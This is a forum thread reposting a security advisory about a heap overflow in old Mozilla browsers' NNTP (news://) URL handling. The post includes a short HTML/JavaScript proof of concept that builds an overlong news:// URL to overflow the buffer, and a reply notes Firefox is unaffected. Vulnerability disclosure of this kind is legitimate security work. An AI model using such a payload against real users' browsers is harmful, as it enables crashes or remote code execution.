Heap overflow in Mozilla Browser
Results 1 to 2 of 2

Thread: Heap overflow in Mozilla Browser

  1. #1
    AO French Antique News Whore
    Join Date
    Aug 2001
    Posts
    2,126

    Heap overflow in Mozilla Browser

    Issue:
    ======

    A critical security vulnerability has been found in Mozilla Project code handling NNTP protocol.

    Details:
    ========

    Mozilla browser supports NNTP urls. Remote side is able to trigger news:// connection to any server. I found a flaw in NNTP handling code which may cause heap overflow and allow remote attacker to execute arbitrary code on client machine.

    Affected Versions
    =================

    Mozilla Browser <= 1.7.3 with mozilla-mail

    Solution
    =========

    This bug is fixed in Mozilla 1.7.5. (Bug 264388) Mozilla developer Dan Veditz claims that it cannot be exploitable: "A '\' on the end will certainly trash memory, but at that point you're no
    longer reading attacker-supplied data;".

    On my RedHat 9.0 with Mozilla 1.7.3 attached proof of concept code overflows the buffer using attacker-supplied data. I decided to make this bug public because Mozilla Team hasn't warned users.

    Proof of Concept
    ============
    <html >
    <script >
    i = "news://news.individual.net/AAAAAAAAAAAAAA?";
    for(l = 0; l < 16376; l++)
    i=i+"A";
    i=i+"/?profile/";
    for(l = 0; l < 16384; l++)
    i=i+"A";
    i=i+"\\";
    window.open(i);
    </script >
    </html >
    Source : http://www.securityfocus.com/archive...7/2005-01-02/0
    Source : http://www.k-otik.com/bugtraq/bulletins/878
    -Simon \"SDK\"

  2. #2
    Senior Member
    Join Date
    Jan 2002
    Posts
    1,207
    Luckily Firefox does not support the news: protocol hence won't be affected.

    Slarty

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •